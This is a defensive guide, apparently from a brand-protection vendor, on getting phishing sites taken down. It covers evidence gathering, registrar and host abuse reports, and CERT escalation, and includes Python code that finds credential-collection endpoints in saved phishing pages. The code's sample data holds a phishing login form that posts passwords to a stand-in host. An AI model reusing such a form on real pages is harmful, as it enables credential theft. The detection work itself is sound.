A practical, step-by-step guide to identifying the registrar, filing abuse reports, engaging hosting providers, and escalating to CERT teams when a phishing site targets your brand.
The moment you discover a phishing site targeting your brand, a clock starts. Industry research shows that the average phishing campaign reaches peak effectiveness within 4–6 hours of launch. After 24 hours, most attack operators voluntarily rotate to a new domain. The window for meaningful intervention is measured in hours — not the days or weeks that most corporate processes require. This guide covers the fastest path from discovery to confirmed removal.
Step 1: Gather Evidence Before Anything Else
Before contacting anyone, document everything. Phishing sites are ephemeral — operators frequently take them down and relaunch on new domains, destroying evidence. Take full-page screenshots with timestamps. Save the page source code. Record the WHOIS data for the domain. Note the IP address and hosting provider. If the site has a login form, document the form action URL (where stolen credentials are sent). This evidence package will be required for every enforcement request you file.
- Screenshot the live site with a visible URL bar and timestamp (use Wayback Machine's Save Page Now as a timestamped backup).
- Save the complete page source (Ctrl+U or curl the URL) — this preserves the credential exfiltration endpoint.
- Run a WHOIS lookup to identify the domain registrar and registration date.
- Perform a DNS lookup to identify the hosting provider's IP range and ASN.
- Check whether the site's TLS (SSL) certificate was issued by a recognized CA; if so, the CA can be notified as an additional enforcement vector.
Use urlscan.io to create a public, timestamped scan of the phishing site. This creates an immutable record that can be referenced in all subsequent abuse reports and legal filings.
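The evidence steps above can be partly scripted once the page source is saved. The following is an added example, not part of the original guide or of any vendor tooling: it hashes a saved page source, extracts each form's action URL (the credential exfiltration endpoint), and flags forms that collect a password or post to a different host. The function and field names, and the `.example` sample page, are constructed for illustration.

```python
import hashlib
from datetime import datetime, timezone
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

class FormCollector(HTMLParser):
    """Collect every <form> with its action, method and input types."""
    def __init__(self):
        super().__init__()
        self.forms, self._open = [], None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._open = {"action": a.get("action") or "",
                          "method": (a.get("method") or "get").lower(), "types": []}
            self.forms.append(self._open)
        elif tag == "input" and self._open is not None:
            self._open["types"].append((a.get("type") or "text").lower())

    def handle_endtag(self, tag):
        if tag == "form":
            self._open = None

def build_evidence(page_url, source_bytes, captured_at=None):
    """Return an evidence record for one saved phishing page."""
    parser = FormCollector()
    parser.feed(source_bytes.decode("utf-8", errors="replace"))
    page_host = urlparse(page_url).hostname
    forms = []
    for f in parser.forms:
        target = urljoin(page_url, f["action"])  # empty action posts back to the page
        forms.append({
            "action_url": target,
            "method": f["method"],
            "collects_password": "password" in f["types"],
            "off_site": urlparse(target).hostname != page_host,
        })
    return {
        "page_url": page_url,
        "captured_at_utc": (captured_at or datetime.now(timezone.utc)).isoformat(),
        "source_sha256": hashlib.sha256(source_bytes).hexdigest(),  # hash the raw bytes as saved
        "forms": forms,
    }

# Constructed sample: a saved page source using reserved .example host names.
SAMPLE_URL = "https://login.brand-secure.example/signin/index.html"
SAMPLE_SOURCE = b"""<form action="https://collector.example/post.php" method="POST">
<input type="text" name="user"><input type="password" name="pass"></form>
<form action="search"><input name="q"></form>"""
EVIDENCE = build_evidence(SAMPLE_URL, SAMPLE_SOURCE)
```

An off-site action URL that collects a password points to a second host, which has its own registrar and hosting provider to include in the abuse reports.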
Step 2: File an Abuse Report with the Registrar
The domain registrar is typically the fastest enforcement vector for phishing sites. Most major registrars (GoDaddy, Namecheap, Cloudflare, Google Domains) have dedicated abuse reporting channels that process phishing complaints within 2–4 hours. Your abuse report should include the phishing URL, evidence screenshots, the legitimate site URL for comparison, and your trademark registration details if applicable. Reference the registrar's Acceptable Use Policy and ICANN's RAA (Registrar Accreditation Agreement) provisions on fraudulent domain use.
"Most people file abuse reports with the hosting provider. That works — but the registrar is faster. Registrars can suspend the entire domain in one action, while hosting takedowns only affect one server and operators can re-point DNS within minutes."
Step 3: Notify the Hosting Provider
In parallel with the registrar report, file an abuse complaint with the hosting provider. Use the IP address from your DNS lookup to identify the provider (tools like IPinfo.io or the ARIN WHOIS database will resolve the IP to an organization). Most cloud providers — AWS, Google Cloud, Microsoft Azure, DigitalOcean — have abuse reporting forms that trigger automated review for phishing content. Include the same evidence package you prepared in Step 1.
Response times vary significantly by provider. AWS and Google Cloud typically respond within 2–4 hours for confirmed phishing. Budget hosting providers and offshore hosts can take 24–72 hours or may not respond at all. If the site is behind Cloudflare's CDN, you will need to file with both Cloudflare (which can reveal the origin IP) and the actual hosting provider.
Step 4: Engage CERT Teams for Critical Threats
- For financial services phishing: contact the Anti-Phishing Working Group (APWG) at reportphishing@apwg.org — they maintain direct relationships with registrars and browsers.
- For government or critical infrastructure impersonation: contact your national CERT (CERT-US, CERT-EU, CERT-UAE), which can issue emergency takedown requests.
- For browser-level blocking: submit the URL to Google Safe Browsing (safebrowsing.google.com) and Microsoft SmartScreen — this blocks the site in Chrome, Firefox, Safari, and Edge within hours.
- For search engine deindexing: file a removal request with Google and Bing to prevent the phishing site from appearing in search results.
When to Escalate Legally
If the registrar and hosting provider are unresponsive after 24 hours, or if the phishing operation is causing significant ongoing harm, legal escalation may be necessary. Emergency TRO (Temporary Restraining Order) applications can compel U.S.-based registrars and hosting providers to act immediately. For international domains, working with local counsel in the registrar's jurisdiction can accelerate the process. In the EU, the DSA (Digital Services Act) provides additional enforcement mechanisms with mandated response timelines.
EzlaScan automates this entire workflow. Our system detects phishing sites targeting protected brands within minutes of launch, files parallel enforcement requests with registrars, hosting providers, CERTs, and browser blocklists simultaneously, and escalates legally when automated channels fail. Median time from detection to confirmed takedown: 47 minutes.